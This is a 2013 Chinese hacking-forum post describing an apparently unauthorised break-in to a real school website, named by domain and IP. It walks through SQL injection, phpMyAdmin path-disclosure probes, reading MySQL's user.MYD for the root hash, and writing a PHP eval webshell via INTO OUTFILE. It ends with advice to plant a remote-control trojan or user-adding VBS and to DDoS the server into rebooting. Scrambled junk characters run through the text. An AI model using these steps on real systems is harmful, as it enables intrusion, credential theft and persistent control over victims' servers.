找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2659|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
1 S0 ]3 Z) |* O( O发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
# Z6 z4 k# ?5 Z, B1 h2 h& Y0 D
& A( t" B5 [& c3 t% Y- U
' d+ u' c9 k% o9 f
  T6 w3 f% G7 d/ F+ z: V; w0 j7 ~常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
7 x" q& ?, ~+ R' d% s- t" B$ F6 R1 U4 a3 q" A
那么想可以直接写入shell ,getshell有几个条件:
# c6 B4 D3 F; T* j0 j
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF; O7 L8 v5 I2 l5 q0 X
. Q* I+ X5 @6 x: p, ]$ h8 `4 s
试着爆绝对路径:
+ u4 k8 ]) K: s1 G1./phpMyAdmin/index.php?lang[]=1  , t, P' t7 V# ^3 {
2./phpMyAdmin/phpinfo.php  . l- F0 \* |9 g& ?0 ]
3./load_file()  
0 a: r2 u/ M( C/ S, R4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5 A/ m1 @, k9 J: j' f5./phpmyadmin/libraries/select_lang.lib.php  6 b1 j* g7 j7 Q) p" v  v+ q! p4 H
6./phpmyadmin/libraries/lect_lang.lib.php  
" z: P' A# w: q5 |7./phpmyadmin/libraries/mcrypt.lib.php   8 A. B9 }) ?! E. N( H
8./phpmyadmin/libraries/export/xls.php  
& P9 C- r1 N/ M+ ]2 y6 v3 J6 @: `, H6 g
均不行...........................3 c2 K6 w$ c3 z: m2 Y8 p/ }" H7 V6 S
' `0 E2 r3 |0 \; R
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php+ l, C6 t! _0 ^7 u4 F* v

" x. x: d9 h9 l8 b6 `权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin : k" I' T8 X& ]8 @: i& o2 G2 q; l

6 W4 u/ G9 J+ l7 R. U. E+ q6 n默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
+ x0 B, x0 i$ n! x) s3 ]3 D
) _2 A9 M& O. O( h8 x# M敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
$ J8 p( M0 P1 I/ c$ ~9 B
7 \8 e( j; q& V想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 7 T' s# z! Q/ V3 ~' @
: x$ h9 e) K. c1 l5 x$ k* s8 [  ]
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 6 A0 B3 X% h& d7 P) A  n
( h0 ~9 Y  W6 f# S6 G6 O" \* e! q/ J8 f
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 6 A/ ^, S; q/ V! D5 {5 E

7 C7 a# W( ?! t) l/ ]2 R2 W6 e成功读到root密码:
# Y1 I; a5 n& Q* M& N
' y0 @/ L* D9 @$ n: |17---- r(0072)
  K/ [- F5 {' V/ _, @% B18---- o(006f)
; Z" z1 M3 `% q" ~19---- o(006f): Y) Z) I/ }+ W, D
20---- t(0074)/ C" Q/ Z; @/ s  @5 P+ ?0 k6 G  }
21---- *(002a)
0 |4 _$ L+ e  D5 }! }& m$ s22---- 8(0038)
5 A; t& n- l/ }% f+ e& ~23---- 2(0032)
! [: F" G7 V8 q+ @3 C" }8 g- f5 m24---- E(0045)" R" x  U" Y6 W/ D! P1 F+ S( E( S
25---- 1(0031)
% v5 _2 {# B5 n" Q. k. p( K3 l26---- C(0043)5 L1 P: W' l3 f: N
27---- 5(0035)
+ I" q$ O; I( h0 F# t+ b28---- 8(0038)' Q2 i, Z6 F9 X' x2 q8 Y. _4 V
29---- 2(0032)4 M$ T2 K2 H" N1 u' V( C6 m  s: |
30---- 8(0038)( `9 Y8 E0 j. C& j5 [& D5 `) m
31---- A(0041)
. s5 E; b. Q4 W5 N/ @* }32---- 9(0039)
7 x. j, s  O8 s$ Y) I33---- B(0042)8 H& }; i* `4 k1 L
34---- 5(0035)
; l/ G' l6 T" O2 a% a6 Q35---- 4(0034)
, h  s% n6 U% G7 F  @7 J36---- 8(0038)
* l. Q  ^9 s* e8 f37---- 6(0036)# g: t! |5 N5 W( V( v" W
38---- 4(0034)
5 U9 y, r6 V) E: ~6 S" f39---- 9(0039)/ O+ C0 m  z0 I5 M& h
40---- 1(0031)! U1 h3 e7 J0 R) V  {8 `
41---- 1(0031)
  t6 h/ B* X) q, S. W6 M42---- 5(0035)
4 j+ G6 G4 [- P7 R) G- h- a- G/ z43---- 3(0033)$ U6 u1 m7 ~7 Q# K7 [- I/ r. G
44---- 5(0035)% h1 B0 N7 P" A- F9 ~3 o
45---- 9(0039)
1 B$ P/ ?# N; M9 p4 N46---- 8(0038)* m' q0 h, B) P# n
47---- F(0046)
* \1 p, @" s: K1 Q; R48---- F(0046)+ z0 t" l2 A6 N: H5 ]
49---- 4(0034)
: q, }! i! W. X50---- F(0046)9 W# n- h( _  Z$ _5 Q  ?  A
51---- 0(0030)
% n4 c8 b: ]- _" A2 D7 }52---- 3(0033)
: P+ I! O# B0 A53---- 2(0032)
" w8 A; O% N9 H; o54---- A(0041)4 ^1 v0 S# w+ ?) |* p, B! Y
55---- 4(0034)2 E, y8 U) e) h/ n3 E  Y
56---- A(0041)
. @* }$ {% J+ A! N57---- B(0042)
. I7 \/ i& v  j0 B9 L58---- *(0044). v! @! ^7 v+ f+ w) f
59---- *(0035)/ f' l" R* I# B( I
60---- *(0041)
; M! i4 }; q! Z! [61---- *0032)3 y6 c& j, T+ o$ |. \8 x
: a' G$ O1 c: E; s0 i4 w* k+ L
解密后成功登陆phpmyamin6 {" l# c: a/ w- N' G! c1 o  U- A
                          
% x/ D- H! W4 @3 y, f# o
' k, L" v7 F" d& g                             
6 v) d/ t) j8 n9 F- }% s6 |6 |. H  P& U- N. i: ], R- e- Q
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
3 o7 @5 @& z$ A+ Q# ]) r
6 }" I$ v5 l. K  k. ^成功执行,拿下shell,菜刀连接:' v% ]3 L4 F& t: {$ ]8 Y3 j

; T" F* H0 ?. l服务器不支持asp,aspx,php提权无果...................* D5 w. q- B' P; F* f1 `
# S! z3 B9 v& E3 N1 F: i
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
2 k9 {" Z9 M6 T+ o. h& O6 n
服务器上已经有个隐藏帐号了

, K7 S1 r$ @% k; a% x3 a
别名     administrators
# ^5 u; ?9 H# ^* q$ q( h! W注释     管理员对计算机/域有不受限制的完全访问权

" [, {$ |% d& b3 t' `( w9 l
成员
) p# W) Q9 ^# X# p
-------------------------------------------------------------------------------/ Q- ?( g! u  {8 e* p0 f
admin0 R9 T6 c3 m) {+ f  V* m8 F
Administrator
- \" b2 ~5 q; U# ?- l- zslipper$6 p' x, J/ Z/ X9 C0 Z. E
sqluser; P; z5 ~# I* Z
命令成功完成。
7 q9 m% g$ p" L: Z. G6 O6 ^, }2 e! a% _  |, |
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。+ ~1 x8 h8 o+ R5 ?. D

6 Y' U5 E  _6 p7 ?" Sddos服务器重启,不然就只能坐等服务器重启了...............................
! z) Z5 B6 R0 K2 k2 v6 u, B- k0 H' I% l, N4 _
      

3 F: l! q' m' ?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表